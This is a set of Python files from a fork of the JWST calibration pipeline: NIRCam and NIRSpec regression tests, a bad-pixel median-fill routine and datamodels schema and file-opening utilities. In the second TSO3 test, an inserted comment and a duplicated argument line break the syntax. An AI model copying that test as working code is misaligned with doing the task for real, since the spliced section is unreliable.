"/jwst/tests_nightly/general/nircam/test_tso3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Tso3Pipeline\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestTso3Pipeline(BaseJWSTTest):\n    input_loc = 'nircam'\n    ref_loc = ['test_caltso3', 'truth']\n    test_dir = 'test_caltso3'\n\n    def test_tso3_pipeline_nrc1(self):\n        \"\"\"Regression test of calwebb_tso3 pipeline on NIRCam simulated data.\n\n        Default imaging mode outlier_detection will be tested here.\n        \"\"\"\n        asn_file = self.get_data(self.test_dir,\n                                 \"jw93065-a3001_20170511t111213_tso3_001_asn.json\")\n        for file in raw_from_asn(asn_file):\n            self.get_data(self.test_dir, file)\n\n        step = Tso3Pipeline()\n        step.scale_detection = False\n        step.outlier_detection.weight_type = 'exptime'\n        step.outlier_detection.pixfrac = 1.0\n        step.outlier_detection.kernel = 'square'\n        step.outlier_detection.fillval = 'INDEF'\n        step.outlier_detection.nlow = 0\n        step.outlier_detection.nhigh = 0\n        step.outlier_detection.maskpt = 0.7\n        step.outlier_detection.grow = 1\n        step.outlier_detection.snr = '4.0 3.0'\n        step.outlier_detection.scale = '0.5 0.4'\n        step.outlier_detection.backg = 0.0\n        step.outlier_detection.save_intermediate_results = False\n        step.outlier_detection.resample_data = False\n        step.outlier_detection.good_bits = 4\n        step.extract_1d.smoothing_length = 0\n        step.extract_1d.bkg_order = 0\n\n        step.run(asn_file)\n\n        outputs = [\n            # Compare level-2c product\n            ('jw93065002001_02101_00001_nrca1_a3001_crfints.fits',\n             'jw93065002001_02101_00001_nrca1_a3001_crfints_ref.fits',\n             ['primary', 'sci', 'dq', 'err']),\n\n            # Compare level-3 product\n            ('jw93065-a3001_t1_nircam_f150w-wlp8_phot.ecsv',\n             'jw93065-a3001_t1_nircam_f150w-wlp8_phot_ref.ecsv'),\n        ]\n        self.compare_outputs(outputs)\n\n\n    def test_tso3_pipeline_nrc2(self):\n        \"\"\"Regression test of calwebb_tso3 pipeline on NIRCam simulated data.\n\n        Scaled imaging mode outlier_detection will be tested here.\n        \"\"\"\n        asn_file = self.get_data(self.test_dir,\n                                 \"jw93065-a3002_20170511t111213_tso3_001_asn.json\")\n
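        # Fetch each member exposure listed in the association before running\n        # the pipeline. Unlike the nrc1 test above, this run sets\n        # scale_detection=True, exercising the scaled variant of imaging-mode\n        # outlier detection described in the docstring.\n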
\"jw93065-a3002_20170511t111213_tso3_001_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Tso3Pipeline()\n step.scale_detection = True\n step.outlier_detection.weight_type = 'exptime'\n step.outlier_detection.pixfrac = 1.0\n step.outlier_detection.kernel = 'square'\n step.outlier_detection.fillval = 'INDEF'\n step.outlier_detection.nlow = 0\n step.outlier_detection.nhigh = 0\n step.outlier_detection.maskpt = 0.7\n step.outlier_detection.grow = 1\n step.outlier_detection.snr = '4.0 3.0'\n step.outlier_detection.scale = '0.5 0.4'\n step.outlier_detection.backg = 0.0\n step.outlier_detection.save_intermediate_results = False\n step.outlier_detection.resample_data = False\n step.outlier_detection.good_bits = 4\n step.extract_1d.smoothing_length = 0\n step.extract_1d.bkg_order = 0\n\n step.run(asn_file)\n outputs = [\n # Compare level-2c product\n ('jw93065002002_02101_00001_nrca1_a3002_crfints.fits',\n 'jw93065002002_02101_00001_nrca1_a3002_crfints_ref.fits',\n ['primary', 'sci', 'dq', 'err']),\n\n # Compare level-3 product\n ('jw93065-a3002_t1_nircam_f150w-wlp8_phot.ecsv',\n 'jw93065-a3002_t1_nircam_f150w-wlp8_phot_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5908036828041077, "alphanum_fraction": 0.5946676731109619, "avg_line_length": 32.610389709472656, "blob_id": "f1eddfbde70ba14cb302d766019455e590a31e10", "content_id": "0d09b27f79ad07f316f0a2e451d7c744f6784b37", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2588, "license_type": "permissive", "max_line_length": 96, "num_lines": 77, "path": "/jwst/coron/median_replace_img.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Replace bad pixels with the median of the surrounding pixel and median fill\n the input images.\n \"\"\"\nimport logging\nimport numpy as np\n\nfrom jwst.datamodels import dqflags\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef median_fill_value(input_array, input_dq_array, bsize, xc, yc):\n \"\"\"\n Arguments:\n ----------\n input_array : ndarray\n Input array to filter.\n input_dq_array : ndarray\n Input data quality array\n bsize : scalar\n box size of the data to extract\n xc: scalar\n x position of the data extraction\n xc: scalar\n y position of the data extraction\n \"\"\"\n # set the half box size\n hbox = int(bsize/2)\n\n # Extract the region of interest for the data\n try:\n data_array = input_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n dq_array = input_dq_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n except IndexError:\n # If the box is outside the data return 0\n log.warning('Box for median filter is outside the data.')\n return 0.\n\n filtered_array = data_array[dq_array != dqflags.pixel['DO_NOT_USE']]\n median_value = np.median(filtered_array)\n\n if np.isnan(median_value):\n # If the median fails return 0\n log.warning('Median filter returned NaN setting value to 0.')\n median_value = 0.\n\n return median_value\n\n\ndef median_replace_img(img_model, box_size):\n \"\"\" Routine to replace any bad pixels with the median value of the surrounding\n pixels.\n Arguments:\n ----------\n input_array : image model\n Input array to filter.\n box_size : scalar\n box size for the median filter\n \"\"\"\n\n n_ints, _, _ = img_model.data.shape\n for nimage in range(n_ints):\n img_int = img_model.data[nimage]\n img_dq = img_model.dq[nimage]\n # check to see if any of the pixels are flagged\n if 
np.count_nonzero(img_dq == dqflags.pixel['DO_NOT_USE']) > 0:\n bad_locations = np.where(np.equal(img_dq, dqflags.pixel['DO_NOT_USE']))\n # fill the bad pixel values with the median of the data in a box region\n for i_pos in range(len(bad_locations[0])):\n x_box_pos = bad_locations[0][i_pos]\n y_box_pos = bad_locations[1][i_pos]\n median_fill = median_fill_value(img_int, img_dq, box_size, x_box_pos, y_box_pos)\n img_int[x_box_pos, y_box_pos] = median_fill\n\n img_model.data[nimage] = img_int\n\n return img_model\n" }, { "alpha_fraction": 0.6898876428604126, "alphanum_fraction": 0.6929775476455688, "avg_line_length": 31.660551071166992, "blob_id": "7af9845c903379d29ad5e3065d4e3bcb9b66bc38", "content_id": "fed2c65931a087e2ab70c22ff2c80fca717fa7ac", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3560, "license_type": "permissive", "max_line_length": 78, "num_lines": 109, "path": "/jwst/regtest/test_nirspec_masterbackground.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\npytestmark = pytest.mark.bigdata\n\n\ndef test_nirspec_fs_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Run a test for NIRSpec FS data with a user-supplied background file.\"\"\"\n\n # Get user-supplied background\n user_background = \"v2_nrs_bkg_user_clean_x1d.fits\"\n rtdata.get_data(f\"nirspec/fs/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/fs/nrs_sci+bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"nrs_sci+bkg_master_background.fits\"\n rtdata.output = output\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_fs_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\ndef test_nirspec_ifu_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Test NIRSpec IFU data with a user-supplied background file.\"\"\"\n # Get user-supplied background\n user_background = \"prism_bkg_x1d.fits\"\n rtdata.get_data(f\"nirspec/ifu/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/ifu/prism_sci_bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"prism_sci_bkg_master_background.fits\"\n rtdata.output = output\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_ifu_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\ndef test_nirspec_mos_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Test NIRSpec MOS data with a user-supplied background file.\"\"\"\n # Get user-supplied background\n user_background = \"v2_nrs_mos_bkg_x1d.fits\"\n rtdata.get_data(f\"nirspec/mos/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/mos/nrs_mos_sci+bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"nrs_mos_sci+bkg_master_background.fits\"\n rtdata.output = output\n\n # 
Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_mos_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\[email protected](\n 'output_file',\n ['ifu_prism_source_on_NRS1_master_background.fits',\n 'ifu_prism_source_off_NRS1_o001_masterbg.fits'],\n ids=[\"on-source\", \"off-source\"]\n)\ndef test_nirspec_ifu_mbkg_nod(rtdata, fitsdiff_default_kwargs, output_file):\n \"\"\"Test NIRSpec IFU prism nodded data.\"\"\"\n # Get input data\n rtdata.get_asn(\"nirspec/ifu/nirspec_spec3_asn.json\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--save_background=True\"]\n Step.from_cmdline(args)\n\n rtdata.output = output_file\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_ifu_mbkg_nod/{output_file}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5434117317199707, "alphanum_fraction": 0.5446975231170654, "avg_line_length": 29.584270477294922, "blob_id": "7bf61a5f527c057b36cc41b3ea0a04bdac519181", "content_id": "59d702c5fd9ee7a6dd45cf79c146c13f25628759", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16332, "license_type": "permissive", "max_line_length": 88, "num_lines": 534, "path": "/jwst/datamodels/properties.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport copy\nimport numpy as np\nfrom collections.abc import Mapping\nfrom astropy.io import fits\n\nfrom astropy.utils.compat.misc import override__dir__\n\nfrom asdf import yamlutil\nfrom asdf.tags.core import ndarray\n\nfrom . import util\nfrom . import validate\nfrom . import schema as mschema\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nlog.addHandler(logging.NullHandler())\n\n\n__all__ = ['ObjectNode', 'ListNode']\n\n\ndef _is_struct_array(val):\n return (isinstance(val, (np.ndarray, fits.FITS_rec)) and\n val.dtype.names is not None and val.dtype.fields is not None)\n\n\ndef _is_struct_array_precursor(val):\n return isinstance(val, list) and isinstance(val[0], tuple)\n\n\ndef _is_struct_array_schema(schema):\n return (isinstance(schema['datatype'], list) and\n any('name' in t for t in schema['datatype']))\n\n\ndef _cast(val, schema):\n val = _unmake_node(val)\n if val is None:\n return None\n\n if 'datatype' in schema:\n # Handle lazy array\n if isinstance(val, ndarray.NDArrayType):\n val = val._make_array()\n\n if (_is_struct_array_schema(schema) and len(val) and\n (_is_struct_array_precursor(val) or _is_struct_array(val))):\n # we are dealing with a structured array. Because we may\n # modify schema (to add shape), we make a deep copy of the\n # schema here:\n schema = copy.deepcopy(schema)\n\n for t, v in zip(schema['datatype'], val[0]):\n if not isinstance(t, Mapping):\n continue\n\n aval = np.asanyarray(v)\n shape = aval.shape\n val_ndim = len(shape)\n\n # make sure that if 'ndim' is specified for a field,\n # it matches the dimensionality of val's field:\n if 'ndim' in t and val_ndim != t['ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. 
\"\n \"Expected {}, got {}\".format(t['ndim'], val_ndim)\n )\n\n if 'max_ndim' in t and val_ndim > t['max_ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. \"\n \"Expected <= {}, got {}\".format(t['max_ndim'], val_ndim)\n )\n\n # if shape of a field's value is not specified in the schema,\n # add it to the schema based on the shape of the actual data:\n if 'shape' not in t:\n t['shape'] = shape\n\n dtype = ndarray.asdf_datatype_to_numpy_dtype(schema['datatype'])\n val = util.gentle_asarray(val, dtype)\n\n if dtype.fields is not None:\n val = _as_fitsrec(val)\n\n if 'ndim' in schema and len(val.shape) != schema['ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. Expected {}, got {}\"\n .format(schema['ndim'], len(val.shape)))\n\n if 'max_ndim' in schema and len(val.shape) > schema['max_ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. Expected <= {}, got {}\"\n .format(schema['max_ndim'], len(val.shape)))\n\n if isinstance(val, np.generic) and np.isscalar(val):\n val = val.item()\n\n return val\n\n\ndef _as_fitsrec(val):\n \"\"\"\n Convert a numpy record into a fits record if it is not one already\n \"\"\"\n if isinstance(val, fits.FITS_rec):\n return val\n else:\n coldefs = fits.ColDefs(val)\n uint = any(c._pseudo_unsigned_ints for c in coldefs)\n fits_rec = fits.FITS_rec(val)\n fits_rec._coldefs = coldefs\n # FITS_rec needs to know if it should be operating in pseudo-unsigned-ints mode,\n # otherwise it won't properly convert integer columns with TZEROn before saving.\n fits_rec._uint = uint\n return fits_rec\n\n\ndef _get_schema_type(schema):\n \"\"\"\n Create a list of types used by a schema and its subschemas when\n the subschemas are joined by combiners. Then return a type string\n if all the types are the same or 'mixed' if they differ\n \"\"\"\n def callback(subschema, path, combiner, types, recurse):\n if 'type' in subschema:\n types.append(subschema['type'])\n\n has_combiner = ('anyOf' in subschema.keys() or\n 'allOf' in subschema.keys())\n return not has_combiner\n\n types = []\n mschema.walk_schema(schema, callback, types)\n\n schema_type = None\n for a_type in types:\n if schema_type is None:\n schema_type = a_type\n elif schema_type != a_type:\n schema_type = 'mixed'\n break\n return schema_type\n\n\ndef _make_default_array(attr, schema, ctx):\n dtype = schema.get('datatype')\n if dtype is not None:\n dtype = ndarray.asdf_datatype_to_numpy_dtype(dtype)\n ndim = schema.get('ndim', schema.get('max_ndim'))\n default = schema.get('default', None)\n primary_array_name = ctx.get_primary_array_name()\n\n if attr == primary_array_name:\n if ctx.shape is not None:\n shape = ctx.shape\n elif ndim is not None:\n shape = tuple([0] * ndim)\n else:\n shape = (0,)\n else:\n if dtype.names is not None:\n if ndim is None:\n shape = (0,)\n else:\n shape = tuple([0] * ndim)\n default = None\n else:\n has_primary_array_shape = False\n if primary_array_name is not None:\n primary_array = getattr(ctx, primary_array_name, None)\n has_primary_array_shape = primary_array is not None\n\n if has_primary_array_shape:\n if ndim is None:\n shape = primary_array.shape\n else:\n shape = primary_array.shape[-ndim:]\n elif ndim is None:\n shape = (0,)\n else:\n shape = tuple([0] * ndim)\n\n array = np.empty(shape, dtype=dtype)\n if default is not None:\n array[...] 
= default\n return array\n\n\ndef _make_default(attr, schema, ctx):\n if 'max_ndim' in schema or 'ndim' in schema or 'datatype' in schema:\n return _make_default_array(attr, schema, ctx)\n elif 'default' in schema:\n return schema['default']\n else:\n schema_type = _get_schema_type(schema)\n if schema_type == 'object':\n return {}\n elif schema_type == 'array':\n return []\n else:\n return None\n\n\ndef _make_node(attr, instance, schema, ctx):\n if isinstance(instance, dict):\n return ObjectNode(attr, instance, schema, ctx)\n elif isinstance(instance, list):\n return ListNode(attr, instance, schema, ctx)\n else:\n return instance\n\n\ndef _unmake_node(obj):\n if isinstance(obj, Node):\n return obj.instance\n return obj\n\n\ndef _get_schema_for_property(schema, attr):\n subschema = schema.get('properties', {}).get(attr, None)\n if subschema is not None:\n return subschema\n for combiner in ['allOf', 'anyOf']:\n for subschema in schema.get(combiner, []):\n subsubschema = _get_schema_for_property(subschema, attr)\n if subsubschema != {}:\n return subsubschema\n return {}\n\n\ndef _get_schema_for_index(schema, i):\n items = schema.get('items', {})\n if isinstance(items, list):\n if i >= len(items):\n return {}\n else:\n return items[i]\n else:\n return items\n\ndef _find_property(schema, attr):\n subschema = _get_schema_for_property(schema, attr)\n if subschema == {}:\n find = False\n else:\n find = 'default' in subschema\n return find\n\nclass Node():\n def __init__(self, attr, instance, schema, ctx):\n self._name = attr\n self._instance = instance\n self._schema = schema\n self._ctx = ctx\n\n def _validate(self):\n instance = yamlutil.custom_tree_to_tagged_tree(self._instance,\n self._ctx._asdf)\n return validate.value_change(self._name, instance, self._schema,\n False, self._ctx._strict_validation)\n\n @property\n def instance(self):\n return self._instance\n\nclass ObjectNode(Node):\n @override__dir__\n def __dir__(self):\n return list(self._schema.get('properties', {}).keys())\n\n def __eq__(self, other):\n if isinstance(other, ObjectNode):\n return self._instance == other._instance\n else:\n return self._instance == other\n\n def __getattr__(self, attr):\n from . 
import ndmodel\n\n if attr.startswith('_'):\n raise AttributeError('No attribute {0}'.format(attr))\n\n schema = _get_schema_for_property(self._schema, attr)\n try:\n val = self._instance[attr]\n except KeyError:\n if schema == {}:\n raise AttributeError(\"No attribute '{0}'\".format(attr))\n val = _make_default(attr, schema, self._ctx)\n if val is not None:\n self._instance[attr] = val\n\n if isinstance(val, dict):\n # Meta is special cased to support NDData interface\n if attr == 'meta':\n node = ndmodel.MetaNode(attr, val, schema, self._ctx)\n else:\n node = ObjectNode(attr, val, schema, self._ctx)\n elif isinstance(val, list):\n node = ListNode(attr, val, schema, self._ctx)\n else:\n node = val\n\n return node\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n self.__dict__[attr] = val\n else:\n schema = _get_schema_for_property(self._schema, attr)\n if val is None:\n val = _make_default(attr, schema, self._ctx)\n val = _cast(val, schema)\n\n node = ObjectNode(attr, val, schema, self._ctx)\n if node._validate():\n self._instance[attr] = val\n\n def __delattr__(self, attr):\n if attr.startswith('_'):\n del self.__dict__[attr]\n else:\n schema = _get_schema_for_property(self._schema, attr)\n if not validate.value_change(attr, None, schema, False,\n self._ctx._strict_validation):\n return\n\n try:\n del self._instance[attr]\n except KeyError:\n raise AttributeError(\n \"Attribute '{0}' missing\".format(attr))\n\n def __iter__(self):\n return NodeIterator(self)\n\n def hasattr(self, attr):\n return attr in self._instance\n\n def items(self):\n # Return a (key, value) tuple for the node\n for key in self:\n val = self\n for field in key.split('.'):\n val = getattr(val, field)\n yield (key, val)\n\nclass ListNode(Node):\n def __cast(self, other):\n if isinstance(other, ListNode):\n return other._instance\n return other\n\n def __repr__(self):\n return repr(self._instance)\n\n def __eq__(self, other):\n return self._instance == self.__cast(other)\n\n def __ne__(self, other):\n return self._instance != self.__cast(other)\n\n def __contains__(self, item):\n return item in self._instance\n\n def __len__(self):\n return len(self._instance)\n\n def __getitem__(self, i):\n schema = _get_schema_for_index(self._schema, i)\n return _make_node(self._name, self._instance[i], schema, self._ctx)\n\n def __setitem__(self, i, val):\n schema = _get_schema_for_index(self._schema, i)\n val = _cast(val, schema)\n node = ObjectNode(self._name, val, schema, self._ctx)\n if node._validate():\n self._instance[i] = val\n\n def __delitem__(self, i):\n del self._instance[i]\n self._validate()\n\n def __getslice__(self, i, j):\n if isinstance(self._schema['items'], list):\n r = range(*(slice(i, j).indices(len(self._instance))))\n schema_parts = [\n _get_schema_for_index(self._schema, x) for x in r\n ]\n else:\n schema_parts = self._schema['items']\n schema = {'type': 'array', 'items': schema_parts}\n return _make_node(self._name, self._instance[i:j], schema, self._ctx)\n\n def __setslice__(self, i, j, other):\n parts = _unmake_node(other)\n parts = [_cast(x, _get_schema_for_index(self._schema, k))\n for (k, x) in enumerate(parts)]\n self._instance[i:j] = _unmake_node(other)\n self._validate()\n\n def __delslice__(self, i, j):\n del self._instance[i:j]\n self._validate()\n\n def append(self, item):\n schema = _get_schema_for_index(self._schema, len(self._instance))\n item = _cast(item, schema)\n node = ObjectNode(self._name, item, schema, self._ctx)\n if node._validate():\n 
self._instance.append(item)\n\n def insert(self, i, item):\n schema = _get_schema_for_index(self._schema, i)\n item = _cast(item, schema)\n node = ObjectNode(self._name, item, schema, self._ctx)\n if node._validate():\n self._instance.insert(i, item)\n\n def pop(self, i=-1):\n schema = _get_schema_for_index(self._schema, 0)\n x = self._instance.pop(i)\n return _make_node(self._name, x, schema, self._ctx)\n\n def remove(self, item):\n self._instance.remove(item)\n\n def count(self, item):\n return self._instance.count(item)\n\n def index(self, item):\n return self._instance.index(item)\n\n def reverse(self):\n self._instance.reverse()\n\n def sort(self, *args, **kwargs):\n self._instance.sort(*args, **kwargs)\n\n def extend(self, other):\n for part in _unmake_node(other):\n self.append(part)\n\n def item(self, **kwargs):\n assert isinstance(self._schema['items'], dict)\n node = ObjectNode(self._name, kwargs, self._schema['items'],\n self._ctx)\n if not node._validate():\n node = None\n return node\n\nclass NodeIterator:\n \"\"\"\n An iterator for a node which flattens the hierachical structure\n \"\"\"\n def __init__(self, node):\n self.key_stack = []\n self.iter_stack = [iter(node._instance.items())]\n\n def __iter__(self):\n return self\n\n def __next__(self):\n while self.iter_stack:\n try:\n key, val = next(self.iter_stack[-1])\n except StopIteration:\n self.iter_stack.pop()\n if self.iter_stack:\n self.key_stack.pop()\n continue\n\n if isinstance(val, dict):\n self.key_stack.append(key)\n self.iter_stack.append(iter(val.items()))\n else:\n return '.'.join(self.key_stack + [key])\n\n raise StopIteration\n\ndef put_value(path, value, tree):\n \"\"\"\n Put a value at the given path into tree, replacing it if it is\n already present.\n\n Parameters\n ----------\n path : list of str or int\n The path to the element.\n\n value : any\n The value to place\n\n tree : JSON object tree\n \"\"\"\n cursor = tree\n for i in range(len(path) - 1):\n part = path[i]\n if isinstance(part, int):\n while len(cursor) <= part:\n cursor.append({})\n cursor = cursor[part]\n else:\n if isinstance(path[i + 1], int) or path[i + 1] == 'items':\n cursor = cursor.setdefault(part, [])\n else:\n cursor = cursor.setdefault(part, {})\n\n if isinstance(path[-1], int):\n while len(cursor) <= path[-1]:\n cursor.append({})\n cursor[path[-1]] = value\n\n\ndef merge_tree(a, b):\n \"\"\"\n Merge elements from tree `b` into tree `a`.\n \"\"\"\n def recurse(a, b):\n if isinstance(b, dict):\n if not isinstance(a, dict):\n return copy.deepcopy(b)\n for key, val in b.items():\n a[key] = recurse(a.get(key), val)\n return a\n return copy.deepcopy(b)\n\n recurse(a, b)\n return a\n" }, { "alpha_fraction": 0.5733563899993896, "alphanum_fraction": 0.575683057308197, "avg_line_length": 29.637474060058594, "blob_id": "bce51353c8dc620af547c4e59efe62b0934ae7f2", "content_id": "22dafbd48040c159f8dc01c7c26ff9acdfdf4b94", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15043, "license_type": "permissive", "max_line_length": 119, "num_lines": 491, "path": "/jwst/datamodels/util.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nVarious utility functions and data types\n\"\"\"\n\nimport sys\nimport warnings\nimport os\nfrom os.path import basename\n\nimport numpy as np\nfrom astropy.io import fits\n\nfrom ..lib import s3_utils\n\nimport logging\nlog = 
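# --- Editor's note: hedged sketch. ---
# NodeIterator above flattens a nested mapping depth-first and yields
# dotted key paths for the leaves, which is what ObjectNode.items() then
# resolves back into values. A compact generator with the same observable
# behavior on plain dicts:
def dotted_keys(mapping, prefix=()):
    for key, val in mapping.items():
        if isinstance(val, dict):
            yield from dotted_keys(val, prefix + (key,))
        else:
            yield '.'.join(prefix + (key,))

tree = {'meta': {'exposure': {'ngroups': 5}, 'filename': 'x.fits'}, 'n': 1}
assert list(dotted_keys(tree)) == ['meta.exposure.ngroups',
                                   'meta.filename', 'n']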
logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nlog.addHandler(logging.NullHandler())\n\n\nclass NoTypeWarning(Warning):\n pass\n\ndef open(init=None, memmap=False, **kwargs):\n \"\"\"\n Creates a DataModel from a number of different types\n\n Parameters\n ----------\n init : shape tuple, file path, file object, astropy.io.fits.HDUList,\n numpy array, dict, None\n\n - None: A default data model with no shape\n\n - shape tuple: Initialize with empty data of the given shape\n\n - file path: Initialize from the given file (FITS , JSON or ASDF)\n\n - readable file object: Initialize from the given file object\n\n - astropy.io.fits.HDUList: Initialize from the given\n `~astropy.io.fits.HDUList`\n\n - A numpy array: A new model with the data array initialized\n to what was passed in.\n\n - dict: The object model tree for the data model\n\n memmap : bool\n Turn memmap of FITS file on or off. (default: False). Ignored for\n ASDF files.\n\n kwargs : dict\n Additional keyword arguments passed to lower level functions. These arguments\n are generally file format-specific. Arguments of note are:\n\n - FITS\n\n skip_fits_update - bool or None\n `True` to skip updating the ASDF tree from the FITS headers, if possible.\n If `None`, value will be taken from the environmental SKIP_FITS_UPDATE.\n Otherwise, the default value is `True`.\n\n Returns\n -------\n model : DataModel instance\n \"\"\"\n\n from . import model_base\n from . import filetype\n\n # Initialize variables used to select model class\n\n hdulist = {}\n shape = ()\n file_name = None\n file_to_close = None\n\n # Get special cases for opening a model out of the way\n # all special cases return a model if they match\n\n if init is None:\n return model_base.DataModel(None)\n\n elif isinstance(init, model_base.DataModel):\n # Copy the object so it knows not to close here\n return init.__class__(init)\n\n elif isinstance(init, (str, bytes)) or hasattr(init, \"read\"):\n # If given a string, presume its a file path.\n # if it has a read method, assume a file descriptor\n\n if isinstance(init, bytes):\n init = init.decode(sys.getfilesystemencoding())\n\n file_name = basename(init)\n file_type = filetype.check(init)\n\n if file_type == \"fits\":\n if s3_utils.is_s3_uri(init):\n hdulist = fits.open(s3_utils.get_object(init))\n else:\n hdulist = fits.open(init, memmap=memmap)\n file_to_close = hdulist\n\n elif file_type == \"asn\":\n # Read the file as an association / model container\n from . import container\n return container.ModelContainer(init, **kwargs)\n\n elif file_type == \"asdf\":\n # Read the file as asdf, no need for a special class\n return model_base.DataModel(init, **kwargs)\n\n elif isinstance(init, tuple):\n for item in init:\n if not isinstance(item, int):\n raise ValueError(\"shape must be a tuple of ints\")\n shape = init\n\n elif isinstance(init, np.ndarray):\n shape = init.shape\n\n elif isinstance(init, fits.HDUList):\n hdulist = init\n\n elif is_association(init) or isinstance(init, list):\n from . 
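# --- Editor's note: hedged usage sketch for open() above; the FITS file
# name is a hypothetical placeholder and jwst must be importable. Per the
# dispatch branches above, open() keys off the type of `init`:
import numpy as np
from jwst import datamodels

m1 = datamodels.open(None)              # default DataModel with no shape
m2 = datamodels.open((10, 10))          # shape tuple: 2-D, so ImageModel
m3 = datamodels.open(np.zeros((4, 4)))  # ndarray initializes the data array
# m4 = datamodels.open('jw_example_rate.fits')  # path: class from DATAMODL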
import container\n return container.ModelContainer(init, **kwargs)\n\n # If we have it, determine the shape from the science hdu\n if hdulist:\n # So we don't need to open the image twice\n init = hdulist\n info = init.fileinfo(0)\n if info is not None:\n file_name = info.get('filename')\n\n try:\n hdu = hdulist[('SCI', 1)]\n except (KeyError, NameError):\n shape = ()\n else:\n if hasattr(hdu, 'shape'):\n shape = hdu.shape\n else:\n shape = ()\n\n # First try to get the class name from the primary header\n new_class = _class_from_model_type(hdulist)\n has_model_type = new_class is not None\n\n # Special handling for ramp files for backwards compatibility\n if new_class is None:\n new_class = _class_from_ramp_type(hdulist, shape)\n\n # Or get the class from the reference file type and other header keywords\n if new_class is None:\n new_class = _class_from_reftype(hdulist, shape)\n\n # Or Get the class from the shape\n if new_class is None:\n new_class = _class_from_shape(hdulist, shape)\n\n # Throw an error if these attempts were unsuccessful\n if new_class is None:\n raise TypeError(\"Can't determine datamodel class from argument to open\")\n\n # Log a message about how the model was opened\n if file_name:\n log.debug(f'Opening {file_name} as {new_class}')\n else:\n log.debug(f'Opening as {new_class}')\n\n # Actually open the model\n model = new_class(init, **kwargs)\n\n # Close the hdulist if we opened it\n if file_to_close is not None:\n model._files_to_close.append(file_to_close)\n\n if not has_model_type:\n class_name = new_class.__name__.split('.')[-1]\n if file_name:\n warnings.warn(f\"model_type not found. Opening {file_name} as a {class_name}\",\n NoTypeWarning)\n try:\n delattr(model.meta, 'model_type')\n except AttributeError:\n pass\n\n return model\n\n\ndef _class_from_model_type(hdulist):\n \"\"\"\n Get the model type from the primary header, lookup to get class\n \"\"\"\n from . import _defined_models as defined_models\n\n if hdulist:\n primary = hdulist[0]\n model_type = primary.header.get('DATAMODL')\n\n if model_type is None:\n new_class = None\n else:\n new_class = defined_models.get(model_type)\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_ramp_type(hdulist, shape):\n \"\"\"\n Special check to see if file is ramp file\n \"\"\"\n if not hdulist:\n new_class = None\n else:\n if len(shape) == 4:\n try:\n hdulist['DQ']\n except KeyError:\n from . import ramp\n new_class = ramp.RampModel\n else:\n new_class = None\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_reftype(hdulist, shape):\n \"\"\"\n Get the class name from the reftype and other header keywords\n \"\"\"\n if not hdulist:\n new_class = None\n\n else:\n primary = hdulist[0]\n reftype = primary.header.get('REFTYPE')\n if reftype is None:\n new_class = 